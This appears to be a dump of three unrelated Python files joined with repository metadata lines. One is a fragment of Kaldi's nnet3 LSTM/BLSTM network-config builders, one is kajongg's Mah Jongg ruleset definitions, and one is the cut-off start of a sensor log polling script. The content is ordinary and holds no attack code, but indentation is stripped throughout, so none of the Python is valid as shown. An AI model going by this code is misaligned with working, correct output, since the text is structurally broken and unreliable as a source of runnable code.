component_nodes.append('output-node name={0} input={1} objective={2}'.format(name, input['descriptor'], objective_type))
else:
component_nodes.append('output-node name={0} input=Offset({1},{2}) objective={3}'.format(name, input['descriptor'], label_delay, objective_type))
def AddFinalLayer(config_lines, input, output_dim,
ng_affine_options = " param-stddev=0 bias-stddev=0 ",
max_change_per_component = 1.5,
label_delay=None,
use_presoftmax_prior_scale = False,
prior_scale_file = None,
include_log_softmax = True,
add_final_sigmoid = False,
name_affix = None,
objective_type = "linear"):
components = config_lines['components']
component_nodes = config_lines['component-nodes']
if name_affix is not None:
final_node_prefix = 'Final-' + str(name_affix)
else:
final_node_prefix = 'Final'
prev_layer_output = AddAffineLayer(config_lines,
final_node_prefix , input, output_dim,
ng_affine_options, max_change_per_component)
if include_log_softmax:
if use_presoftmax_prior_scale :
components.append('component name={0}-fixed-scale type=FixedScaleComponent scales={1}'.format(final_node_prefix, prior_scale_file))
component_nodes.append('component-node name={0}-fixed-scale component={0}-fixed-scale input={1}'.format(final_node_prefix,
prev_layer_output['descriptor']))
prev_layer_output['descriptor'] = "{0}-fixed-scale".format(final_node_prefix)
prev_layer_output = AddSoftmaxLayer(config_lines, final_node_prefix, prev_layer_output)
elif add_final_sigmoid:
# Useful when you need the final outputs to be probabilities
# between 0 and 1.
# Usually used with an objective-type such as "quadratic"
prev_layer_output = AddSigmoidLayer(config_lines, final_node_prefix, prev_layer_output)
# we use the same name_affix as a prefix in for affine/scale nodes but as a
# suffix for output node
AddOutputLayer(config_lines, prev_layer_output, label_delay, suffix = name_affix, objective_type = objective_type)
def AddLstmLayer(config_lines,
name, input, cell_dim,
recurrent_projection_dim = 0,
non_recurrent_projection_dim = 0,
clipping_threshold = 30.0,
zeroing_threshold = 15.0,
zeroing_interval = 20,
ng_per_element_scale_options = "",
ng_affine_options = "",
lstm_delay = -1,
self_repair_scale_nonlinearity = None,
max_change_per_component = 0.75):
assert(recurrent_projection_dim >= 0 and non_recurrent_projection_dim >= 0)
components = config_lines['components']
component_nodes = config_lines['component-nodes']
input_descriptor = input['descriptor']
input_dim = input['dimension']
name = name.strip()
if (recurrent_projection_dim == 0):
add_recurrent_projection = False
recurrent_projection_dim = cell_dim
recurrent_connection = "m_t"
else:
add_recurrent_projection = True
recurrent_connection = "r_t"
if (non_recurrent_projection_dim == 0):
add_non_recurrent_projection = False
else:
add_non_recurrent_projection = True
# self_repair_scale_nonlinearity is a constant scaling the self-repair vector computed in derived classes of NonlinearComponent,
# i.e., SigmoidComponent, TanhComponent and RectifiedLinearComponent
self_repair_nonlinearity_string = "self-repair-scale={0:.10f}".format(self_repair_scale_nonlinearity) if self_repair_scale_nonlinearity is not None else ''
# Natural gradient per element scale parameters
ng_per_element_scale_options += " param-mean=0.0 param-stddev=1.0 "
# Per-component max-change option
max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
# Parameter Definitions W*(* replaced by - to have valid names)
components.append("# Input gate control : W_i* matrices")
components.append("component name={0}_W_i-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_ic type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
components.append("# Forget gate control : W_f* matrices")
components.append("component name={0}_W_f-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_fc type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
components.append("# Output gate control : W_o* matrices")
components.append("component name={0}_W_o-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
components.append("# note : the cell outputs pass through a diagonal matrix")
components.append("component name={0}_w_oc type=NaturalGradientPerElementScaleComponent dim={1} {2} {3}".format(name, cell_dim, ng_per_element_scale_options, max_change_options))
components.append("# Cell input matrices : W_c* matrices")
components.append("component name={0}_W_c-xr type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input_dim + recurrent_projection_dim, cell_dim, ng_affine_options, max_change_options))
components.append("# Defining the non-linearities")
components.append("component name={0}_i type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
components.append("component name={0}_f type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
components.append("component name={0}_o type=SigmoidComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
components.append("component name={0}_g type=TanhComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
components.append("component name={0}_h type=TanhComponent dim={1} {2}".format(name, cell_dim, self_repair_nonlinearity_string))
components.append("# Defining the cell computations")
components.append("component name={0}_c1 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c2 type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_m type=ElementwiseProductComponent input-dim={1} output-dim={2}".format(name, 2 * cell_dim, cell_dim))
components.append("component name={0}_c type=BackpropTruncationComponent dim={1} "
"clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
"recurrence-interval={5}".format(name, cell_dim, clipping_threshold, zeroing_threshold,
zeroing_interval, abs(lstm_delay)))
# c1_t and c2_t defined below
component_nodes.append("component-node name={0}_c_t component={0}_c input=Sum({0}_c1_t, {0}_c2_t)".format(name))
c_tminus1_descriptor = "IfDefined(Offset({0}_c_t, {1}))".format(name, lstm_delay)
component_nodes.append("# i_t")
component_nodes.append("component-node name={0}_i1 component={0}_W_i-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_i2 component={0}_w_ic input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_i_t component={0}_i input=Sum({0}_i1, {0}_i2)".format(name))
component_nodes.append("# f_t")
component_nodes.append("component-node name={0}_f1 component={0}_W_f-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_f2 component={0}_w_fc input={1}".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_f_t component={0}_f input=Sum({0}_f1,{0}_f2)".format(name))
component_nodes.append("# o_t")
component_nodes.append("component-node name={0}_o1 component={0}_W_o-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_o2 component={0}_w_oc input={0}_c_t".format(name))
component_nodes.append("component-node name={0}_o_t component={0}_o input=Sum({0}_o1, {0}_o2)".format(name))
component_nodes.append("# h_t")
component_nodes.append("component-node name={0}_h_t component={0}_h input={0}_c_t".format(name))
component_nodes.append("# g_t")
component_nodes.append("component-node name={0}_g1 component={0}_W_c-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
component_nodes.append("component-node name={0}_g_t component={0}_g input={0}_g1".format(name))
component_nodes.append("# parts of c_t")
component_nodes.append("component-node name={0}_c1_t component={0}_c1 input=Append({0}_f_t, {1})".format(name, c_tminus1_descriptor))
component_nodes.append("component-node name={0}_c2_t component={0}_c2 input=Append({0}_i_t, {0}_g_t)".format(name))
component_nodes.append("# m_t")
component_nodes.append("component-node name={0}_m_t component={0}_m input=Append({0}_o_t, {0}_h_t)".format(name))
# add the recurrent connections
if (add_recurrent_projection and add_non_recurrent_projection):
components.append("# projection matrices : Wrm and Wpm")
components.append("component name={0}_W-m type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, cell_dim, recurrent_projection_dim + non_recurrent_projection_dim, ng_affine_options, max_change_options))
components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
"clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
"recurrence-interval={5}".format(name, recurrent_projection_dim, clipping_threshold,
zeroing_threshold, zeroing_interval, abs(lstm_delay)))
component_nodes.append("# r_t and p_t")
component_nodes.append("component-node name={0}_rp_t component={0}_W-m input={0}_m_t".format(name))
component_nodes.append("dim-range-node name={0}_r_t_preclip input-node={0}_rp_t dim-offset=0 dim={1}".format(name, recurrent_projection_dim))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_rp_t'.format(name)
output_dim = recurrent_projection_dim + non_recurrent_projection_dim
elif add_recurrent_projection:
components.append("# projection matrices : Wrm")
components.append("component name={0}_Wrm type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(
name, cell_dim, recurrent_projection_dim, ng_affine_options, max_change_options))
components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
"clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
"recurrence-interval={5}".format(name, recurrent_projection_dim, clipping_threshold,
zeroing_threshold, zeroing_interval, abs(lstm_delay)))
component_nodes.append("# r_t")
component_nodes.append("component-node name={0}_r_t_preclip component={0}_Wrm input={0}_m_t".format(name))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = recurrent_projection_dim
else:
components.append("component name={0}_r type=BackpropTruncationComponent dim={1} "
"clipping-threshold={2} zeroing-threshold={3} zeroing-interval={4} "
"recurrence-interval={5}".format(name, cell_dim, clipping_threshold,
zeroing_threshold, zeroing_interval, abs(lstm_delay)))
component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_m_t".format(name))
output_descriptor = '{0}_r_t'.format(name)
output_dim = cell_dim
return {
'descriptor': output_descriptor,
'dimension':output_dim
}
def AddBLstmLayer(config_lines,
name, input, cell_dim,
recurrent_projection_dim = 0,
non_recurrent_projection_dim = 0,
clipping_threshold = 1.0,
zeroing_threshold = 3.0,
zeroing_interval = 20,
ng_per_element_scale_options = "",
ng_affine_options = "",
lstm_delay = [-1,1],
self_repair_scale_nonlinearity = None,
max_change_per_component = 0.75):
assert(len(lstm_delay) == 2 and lstm_delay[0] < 0 and lstm_delay[1] > 0)
output_forward = AddLstmLayer(config_lines = config_lines,
name = "{0}_forward".format(name),
input = input,
cell_dim = cell_dim,
recurrent_projection_dim = recurrent_projection_dim,
non_recurrent_projection_dim = non_recurrent_projection_dim,
clipping_threshold = clipping_threshold,
zeroing_threshold = zeroing_threshold,
zeroing_interval = zeroing_interval,
ng_per_element_scale_options = ng_per_element_scale_options,
ng_affine_options = ng_affine_options,
lstm_delay = lstm_delay[0],
self_repair_scale_nonlinearity = self_repair_scale_nonlinearity,
max_change_per_component = max_change_per_component)
output_backward = AddLstmLayer(config_lines = config_lines,
name = "{0}_backward".format(name),
input = input,
cell_dim = cell_dim,
recurrent_projection_dim = recurrent_projection_dim,
non_recurrent_projection_dim = non_recurrent_projection_dim,
clipping_threshold = clipping_threshold,
zeroing_threshold = zeroing_threshold,
zeroing_interval = zeroing_interval,
ng_per_element_scale_options = ng_per_element_scale_options,
ng_affine_options = ng_affine_options,
lstm_delay = lstm_delay[1],
self_repair_scale_nonlinearity = self_repair_scale_nonlinearity,
max_change_per_component = max_change_per_component)
output_descriptor = 'Append({0}, {1})'.format(output_forward['descriptor'], output_backward['descriptor'])
output_dim = output_forward['dimension'] + output_backward['dimension']
return {
'descriptor': output_descriptor,
'dimension':output_dim
}
| michellemorales/OpenMM | kaldi/egs/wsj/s5/steps/nnet3/components.py | Python | gpl-2.0 | 29,765 |
# -*- coding: utf-8 -*-
"""Copyright (C) 2009,2010 Wolfgang Rohdewald <wolfgang@rohdewald.de>
kajongg is free software you can redistribute it and/or modifys
it under the terms of the GNU General Public License as published by
the Free Software Foundation either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
# See the user manual for a description of how to define rulesets.
# Names and descriptions must be english and may only contain ascii chars.
# Because kdecore.i18n() only accepts 8bit characters, no unicode.
# The KDE translation teams will "automatically" translate name and
# description into many languages.
from rule import Rule, PredefinedRuleset
from util import m18nE, m18n
class ClassicalChinese(PredefinedRuleset):
"""classical chinese rules, standard rules. Serves as a basis
for local variants. This should be defined such that the
sum of the differences to the local variants is minimized."""
def __init__(self, name=None):
PredefinedRuleset.__init__(self, name or m18nE('Classical Chinese standard'))
def initRuleset(self):
"""sets the description"""
self.description = m18n('Classical Chinese')
def addManualRules(self):
"""those are actually winner rules but in the kajongg scoring mode they must be selected manually"""
# applicable only if we have a concealed meld and a declared kong:
self.winnerRules.add(Rule('Last Tile Taken from Dead Wall',
'FLastTileFromDeadWall||Olastsource=e', doubles=1,
description=m18n('The dead wall is also called kong box: The last 16 tiles of the wall '
'used as source of replacement tiles')))
self.winnerRules.add(Rule('Last Tile is Last Tile of Wall',
'FIsLastTileFromWall||Olastsource=z', doubles=1,
description=m18n('Winner said Mah Jong with the last tile taken from the living end of the wall')))
self.winnerRules.add(Rule('Last Tile is Last Tile of Wall Discarded',
'FIsLastTileFromWallDiscarded||Olastsource=Z', doubles=1,
description=m18n('Winner said Mah Jong by claiming the last tile taken from the living end of the '
'wall, discarded by another player')))
self.winnerRules.add(Rule('Robbing the Kong', r'FRobbingKong||Olastsource=k', doubles=1,
description=m18n('Winner said Mah Jong by claiming the 4th tile of a kong another player '
'just declared'), debug=True))
self.winnerRules.add(Rule('Mah Jongg with Original Call',
'FMahJonggWithOriginalCall||Odeclaration=a', doubles=1,
description=m18n(
'Just before the first discard, a player can declare Original Call meaning she needs only one '
'tile to complete the hand and announces she will not alter the hand in any way (except bonus tiles)')))
self.winnerRules.add(Rule('Dangerous Game', 'FDangerousGame||Opayforall',
description=m18n('In some situations discarding a tile that has a high chance to help somebody to win '
'is declared to be dangerous, and if that tile actually makes somebody win, the discarder '
'pays the winner for all')))
self.winnerRules.add(Rule('Twofold Fortune', 'FTwofoldFortune||Odeclaration=t',
limits=1, description=m18n('Kong after Kong: Declare Kong and a second Kong with the replacement '
'tile and Mah Jong with the second replacement tile')))
# limit hands:
self.winnerRules.add(Rule('Blessing of Heaven', 'FBlessingOfHeaven||Olastsource=1', limits=1,
description=m18n('East says Mah Jong with the unmodified dealt tiles')))
self.winnerRules.add(Rule('Blessing of Earth', 'FBlessingOfEarth||Olastsource=1', limits=1,
description=m18n('South, West or North says Mah Jong with the first tile discarded by East')))
# the next rule is never proposed, the program applies it when appropriate. Do not change the XEAST9X.
# XEAST9X is meant to never match a hand, and the program will identify this rule by searching for XEAST9X
self.winnerRules.add(Rule('East won nine times in a row', r'XEAST9X||Oabsolute', limits=1,
description=m18n('If that happens, East gets a limit score and the winds rotate')))
def addPenaltyRules(self):
"""as the name says"""
self.penaltyRules.add(Rule(
'False Naming of Discard, Claimed for Mah Jongg and False Declaration of Mah Jongg',
'Oabsolute payers=2 payees=2', points = -300))
def addHandRules(self):
"""as the name says"""
self.handRules.add(Rule('Own Flower and Own Season', 'FOwnFlowerOwnSeason', doubles=1))
self.handRules.add(Rule('All Flowers', 'FAllFlowers', doubles=1))
self.handRules.add(Rule('All Seasons', 'FAllSeasons', doubles=1))
self.handRules.add(Rule('Three Concealed Pongs', 'FThreeConcealedPongs', doubles=1))
self.handRules.add(Rule('Long Hand', r'FLongHand||Oabsolute', points=0,
description=m18n('The hand contains too many tiles')))
def addParameterRules(self):
"""as the name says"""
self.parameterRules.add(Rule('Points Needed for Mah Jongg', 'intminMJPoints||Omandatory', parameter=0))
self.parameterRules.add(Rule('Minimum number of doubles needed for Mah Jongg',
'intminMJDoubles||OMandatory', parameter=0))
self.parameterRules.add(Rule('Points for a Limit Hand', 'intlimit||Omandatory||Omin=1', parameter=500))
# TODO: we are in string freeze, so for now we just add this option but make it noneditable
msg = ''
self.parameterRules.add(Rule(msg, 'boolroofOff||Omandatory', parameter=False))
self.parameterRules.add(Rule('Claim Timeout', 'intclaimTimeout||Omandatory', parameter=10))
self.parameterRules.add(Rule('Size of Kong Box', 'intkongBoxSize||Omandatory', parameter=16,
description=m18n('The Kong Box is used for replacement tiles when declaring kongs')))
self.parameterRules.add(Rule('Play with Bonus Tiles', 'boolwithBonusTiles||OMandatory', parameter=True,
description=m18n('Bonus tiles increase the luck factor')))
self.parameterRules.add(Rule('Minimum number of rounds in game', 'intminRounds||OMandatory', parameter=4))
self.parameterRules.add(Rule('number of allowed chows', 'intmaxChows||Omandatory', parameter=4,
description=m18n('The number of chows a player may build')))
self.parameterRules.add(Rule('must declare calling hand',
'boolmustDeclareCallingHand||Omandatory', parameter=False,
description=m18n('Mah Jongg is only allowed after having declared to have a calling hand')))
def loadRules(self):
"""define the rules"""
self.addParameterRules() # must be first!
self.addPenaltyRules()
self.addHandRules()
self.addManualRules()
self.winnerRules.add(Rule('Last Tile Completes Pair of 2..8', 'FLastTileCompletesPairMinor', points=2))
self.winnerRules.add(Rule('Last Tile Completes Pair of Terminals or Honors',
'FLastTileCompletesPairMajor', points=4))
self.winnerRules.add(Rule('Last Tile is Only Possible Tile', 'FLastOnlyPossible', points=4))
self.winnerRules.add(Rule('Won with Last Tile Taken from Wall', 'FLastFromWall', points=2))
self.winnerRules.add(Rule('Zero Point Hand', 'FZeroPointHand', doubles=1,
description=m18n('The hand has 0 basis points excluding bonus tiles')))
self.winnerRules.add(Rule('No Chow', 'FNoChow', doubles=1))
self.winnerRules.add(Rule('Only Concealed Melds', 'FOnlyConcealedMelds', doubles=1))
self.winnerRules.add(Rule('False Color Game', 'FFalseColorGame', doubles=1,
description=m18n('Only same-colored tiles (only bamboo/stone/character) '
'plus any number of winds and dragons')))
self.winnerRules.add(Rule('True Color Game', 'FTrueColorGame', doubles=3,
description=m18n('Only same-colored tiles (only bamboo/stone/character)')))
self.winnerRules.add(Rule('Concealed True Color Game', 'FConcealedTrueColorGame',
limits=1, description=m18n('All tiles concealed and of the same suit, no honors')))
self.winnerRules.add(Rule('Only Terminals and Honors', 'FOnlyMajors', doubles=1,
description=m18n('Only winds, dragons, 1 and 9')))
self.winnerRules.add(Rule('Only Honors', 'FOnlyHonors', limits=1,
description=m18n('Only winds and dragons')))
self.winnerRules.add(Rule('Hidden Treasure', 'FHiddenTreasure', limits=1,
description=m18n('Only hidden Pungs or Kongs, last tile from wall')))
self.winnerRules.add(Rule('Heads and Tails', 'FAllTerminals', limits=1,
description=m18n('Only 1 and 9')))
self.winnerRules.add(Rule('Fourfold Plenty', 'FFourfoldPlenty', limits=1,
description=m18n('4 Kongs')))
self.winnerRules.add(Rule('Three Great Scholars', 'FThreeGreatScholars', limits=1,
description=m18n('3 Pungs or Kongs of dragons')))
self.winnerRules.add(Rule('Four Blessings Hovering Over the Door',
'FFourBlessingsHoveringOverTheDoor', limits=1,
description=m18n('4 Pungs or Kongs of winds')))
self.winnerRules.add(Rule('All Greens', 'FAllGreen', limits=1,
description=m18n('Only green tiles: Green dragon and Bamboo 2,3,4,6,8')))
self.winnerRules.add(Rule('Gathering the Plum Blossom from the Roof',
'FGatheringPlumBlossomFromRoof', limits=1,
description=m18n('Mah Jong with stone 5 from the dead wall')))
self.winnerRules.add(Rule('Plucking the Moon from the Bottom of the Sea', 'FPluckingMoon', limits=1,
description=m18n('Mah Jong with the last tile from the wall being a stone 1')))
self.winnerRules.add(Rule('Scratching a Carrying Pole', 'FScratchingPole', limits=1,
description=m18n('Robbing the Kong of bamboo 2')))
# only hands matching an mjRule can win. Keep this list as short as
# possible. If a special hand matches the standard pattern, do not put it here
# All mjRule functions must have a winningTileCandidates() method
self.mjRules.add(Rule('Standard Mah Jongg', 'FStandardMahJongg', points=20))
self.mjRules.add(Rule('Nine Gates', 'FGatesOfHeaven||OlastExtra', limits=1,
description=m18n('All tiles concealed of same color: Values 1-1-1-2-3-4-5-6-7-8-9-9-9 completed '
'with another tile of the same color (from wall or discarded)')))
self.mjRules.add(Rule('Thirteen Orphans', 'FThirteenOrphans||Omayrobhiddenkong', limits=1,
description=m18n('13 single tiles: All dragons, winds, 1, 9 and a 14th tile building a pair '
'with one of them')))
# doubling melds:
self.meldRules.add(Rule('Pung/Kong of Dragons', 'FDragonPungKong', doubles=1))
self.meldRules.add(Rule('Pung/Kong of Own Wind', 'FOwnWindPungKong', doubles=1))
self.meldRules.add(Rule('Pung/Kong of Round Wind', 'FRoundWindPungKong', doubles=1))
# exposed melds:
self.meldRules.add(Rule('Exposed Kong', 'FExposedMinorKong', points=8))
self.meldRules.add(Rule('Exposed Kong of Terminals', 'FExposedTerminalsKong', points=16))
self.meldRules.add(Rule('Exposed Kong of Honors', 'FExposedHonorsKong', points=16))
self.meldRules.add(Rule('Exposed Pung', 'FExposedMinorPung', points=2))
self.meldRules.add(Rule('Exposed Pung of Terminals', 'FExposedTerminalsPung', points=4))
self.meldRules.add(Rule('Exposed Pung of Honors', 'FExposedHonorsPung', points=4))
# concealed melds:
self.meldRules.add(Rule('Concealed Kong', 'FConcealedMinorKong', points=16))
self.meldRules.add(Rule('Concealed Kong of Terminals', 'FConcealedTerminalsKong', points=32))
self.meldRules.add(Rule('Concealed Kong of Honors', 'FConcealedHonorsKong', points=32))
self.meldRules.add(Rule('Concealed Pung', 'FConcealedMinorPung', points=4))
self.meldRules.add(Rule('Concealed Pung of Terminals', 'FConcealedTerminalsPung', points=8))
self.meldRules.add(Rule('Concealed Pung of Honors', 'FConcealedHonorsPung', points=8))
self.meldRules.add(Rule('Pair of Own Wind', 'FOwnWindPair', points=2))
self.meldRules.add(Rule('Pair of Round Wind', 'FRoundWindPair', points=2))
self.meldRules.add(Rule('Pair of Dragons', 'FDragonPair', points=2))
# bonus tiles:
self.meldRules.add(Rule('Flower', 'FFlower', points=4))
self.meldRules.add(Rule('Season', 'FSeason', points=4))
class ClassicalChineseDMJL(ClassicalChinese):
"""classical chinese rules, German rules"""
def __init__(self, name=None):
ClassicalChinese.__init__(self, name or m18nE('Classical Chinese DMJL'))
def initRuleset(self):
"""sets the description"""
ClassicalChinese.initRuleset(self)
self.description = m18n('Classical Chinese as defined by the Deutsche Mah Jongg Liga (DMJL) e.V.')
def loadRules(self):
ClassicalChinese.loadRules(self)
# the squirming snake is only covered by standard mahjongg rule if tiles are ordered
self.mjRules.add(Rule('Squirming Snake', 'FSquirmingSnake', limits=1,
description=m18n('All tiles of same color. Pung or Kong of 1 and 9, pair of 2, 5 or 8 and two '
'Chows of the remaining values')))
self.handRules.add(Rule('Little Three Dragons', 'FLittleThreeDragons', doubles=1,
description=m18n('2 Pungs or Kongs of dragons and 1 pair of dragons')))
self.handRules.add(Rule('Big Three Dragons', 'FBigThreeDragons', doubles=2,
description=m18n('3 Pungs or Kongs of dragons')))
self.handRules.add(Rule('Little Four Joys', 'FLittleFourJoys', doubles=1,
description=m18n('3 Pungs or Kongs of winds and 1 pair of winds')))
self.handRules.add(Rule('Big Four Joys', 'FBigFourJoys', doubles=2,
description=m18n('4 Pungs or Kongs of winds')))
self.winnerRules['Only Honors'].doubles = 2
self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Chow', points = -50))
self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Pung/Kong', points = -100))
self.penaltyRules.add(Rule('False Declaration of Mah Jongg by One Player',
'Oabsolute payees=3', points = -300))
self.penaltyRules.add(Rule('False Declaration of Mah Jongg by Two Players',
'Oabsolute payers=2 payees=2', points = -300))
self.penaltyRules.add(Rule('False Declaration of Mah Jongg by Three Players',
'Oabsolute payers=3', points = -300))
self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Mah Jongg',
'Oabsolute payees=3', points = -300))
class ClassicalChineseBMJA(ClassicalChinese):
"""classical chinese rules, British rules"""
def __init__(self, name=None):
ClassicalChinese.__init__(self, name or m18nE('Classical Chinese BMJA'))
def initRuleset(self):
"""sets the description"""
ClassicalChinese.initRuleset(self)
self.description = m18n('Classical Chinese as defined by the British Mah-Jong Association')
def addParameterRules(self):
"""those differ for BMJA from standard"""
ClassicalChinese.addParameterRules(self)
self.parameterRules['Size of Kong Box'].parameter = 14
self.parameterRules['number of allowed chows'].parameter = 1
self.parameterRules['Points for a Limit Hand'].parameter = 1000
self.parameterRules['must declare calling hand'].parameter = True
def loadRules(self):
# TODO: we need a separate part for any number of announcements. Both r for robbing kong and a for
# Original Call can be possible together.
ClassicalChinese.loadRules(self)
del self.winnerRules['Zero Point Hand']
originalCall = self.winnerRules.pop('Mah Jongg with Original Call')
originalCall.name = m18n('Original Call')
self.handRules.add(originalCall)
del self.mjRules['Nine Gates']
self.mjRules.add(Rule('Gates of Heaven', 'FGatesOfHeaven||Opair28', limits=1,
description=m18n('All tiles concealed of same color: Values 1-1-1-2-3-4-5-6-7-8-9-9-9 and '
'another tile 2..8 of the same color')))
self.mjRules.add(Rule('Wriggling Snake', 'FWrigglingSnake', limits=1,
description=m18n('Pair of 1s and a run from 2 to 9 in the same suit with each of the winds')))
self.mjRules.add(Rule('Triple Knitting', 'FTripleKnitting', limits=0.5,
description=m18n('Four sets of three tiles in the different suits and a pair: No Winds or Dragons')))
self.mjRules.add(Rule('Knitting', 'FKnitting', limits=0.5,
description=m18n('7 pairs of tiles in any 2 out of 3 suits; no Winds or Dragons')))
self.mjRules.add(Rule('All pair honors', 'FAllPairHonors', limits=0.5,
description=m18n('7 pairs of 1s/9s/Winds/Dragons')))
del self.handRules['Own Flower and Own Season']
del self.handRules['Three Concealed Pongs']
self.handRules.add(Rule('Own Flower', 'FOwnFlower', doubles=1))
self.handRules.add(Rule('Own Season', 'FOwnSeason', doubles=1))
del self.winnerRules['Last Tile Taken from Dead Wall']
del self.winnerRules['Hidden Treasure']
del self.winnerRules['False Color Game']
del self.winnerRules['Concealed True Color Game']
del self.winnerRules['East won nine times in a row']
del self.winnerRules['Last Tile Completes Pair of 2..8']
del self.winnerRules['Last Tile Completes Pair of Terminals or Honors']
del self.winnerRules['Last Tile is Only Possible Tile']
self.winnerRules.add(Rule('Buried Treasure', 'FBuriedTreasure', limits=1,
description=m18n('Concealed pungs of one suit with winds/dragons and a pair')))
del self.winnerRules['True Color Game']
self.winnerRules.add(Rule('Purity', 'FPurity', doubles=3,
description=m18n('Only same-colored tiles (no chows, dragons or winds)')))
self.winnerRules['All Greens'].name = m18n('Imperial Jade')
self.mjRules['Thirteen Orphans'].name = m18n('The 13 Unique Wonders')
del self.winnerRules['Three Great Scholars']
self.winnerRules.add(Rule('Three Great Scholars', 'FThreeGreatScholars||Onochow', limits=1,
description=m18n('3 Pungs or Kongs of dragons plus any pung/kong and a pair')))
self.handRules['All Flowers'].score.doubles = 2
self.handRules['All Seasons'].score.doubles = 2
self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Chow/Pung/Kong', points = -50))
self.penaltyRules.add(Rule('False Declaration of Mah Jongg by One Player',
'Oabsolute payees=3', limits = -0.5))
self.winnerRules.add(Rule('False Naming of Discard, Claimed for Mah Jongg', 'FFalseDiscardForMJ||Opayforall'))
self.loserRules.add(Rule('Calling for Only Honors', 'FCallingHand||Ohand=OnlyHonors', limits=0.4))
self.loserRules.add(Rule('Calling for Wriggling Snake', 'FCallingHand||Ohand=WrigglingSnake', limits=0.4))
self.loserRules.add(Rule('Calling for Triple Knitting', 'FCallingHand||Ohand=TripleKnitting', limits=0.2))
self.loserRules.add(Rule('Calling for Gates of Heaven', 'FCallingHand||Ohand=GatesOfHeaven||Opair28',
limits=0.4))
self.loserRules.add(Rule('Calling for Knitting', 'FCallingHand||Ohand=Knitting', limits=0.2))
self.loserRules.add(Rule('Calling for Imperial Jade', 'FCallingHand||Ohand=AllGreen', limits=0.4))
self.loserRules.add(Rule('Calling for 13 Unique Wonders', 'FCallingHand||Ohand=ThirteenOrphans',
limits=0.4))
self.loserRules.add(Rule('Calling for Three Great Scholars', 'FCallingHand||Ohand=ThreeGreatScholars',
limits=0.4))
self.loserRules.add(Rule('Calling for All pair honors', 'FCallingHand||Ohand=AllPairHonors', limits=0.2))
self.loserRules.add(Rule('Calling for Heads and Tails', 'FCallingHand||Ohand=AllTerminals', limits=0.4))
self.loserRules.add(Rule('Calling for Four Blessings Hovering over the Door',
'FCallingHand||Ohand=FourBlessingsHoveringOverTheDoor', limits=0.4))
self.loserRules.add(Rule('Calling for Buried Treasure', 'FCallingHand||Ohand=BuriedTreasure', limits=0.4))
self.loserRules.add(Rule('Calling for Fourfold Plenty', 'FCallingHand||Ohand=FourfoldPlenty', limits=0.4))
self.loserRules.add(Rule('Calling for Purity', 'FCallingHand||Ohand=Purity', doubles=3))
def loadPredefinedRulesets():
"""add new predefined rulesets here"""
if not PredefinedRuleset.classes:
PredefinedRuleset.classes.add(ClassicalChineseDMJL)
PredefinedRuleset.classes.add(ClassicalChineseBMJA)
| jsj2008/kdegames | kajongg/src/predefined.py | Python | gpl-2.0 | 21,844 |
#!/usr/bin/env python
""" Poll sensor data log file
Poll the sensor data log file periodically and use parse_log to submit new
values via http.
"""
import time
from subprocess import call
LOG_FILE = 'aginovadb.log'
PARSER = 'parse_log.py'
POLL_INTERVAL = 120 # in seconds
def main():
"""Periodically run the log parser"""
while True:
epoch = int(time.mktime(time.gmtime()))
print "polling '%s': %s" % (LOG_FILE, epoch)
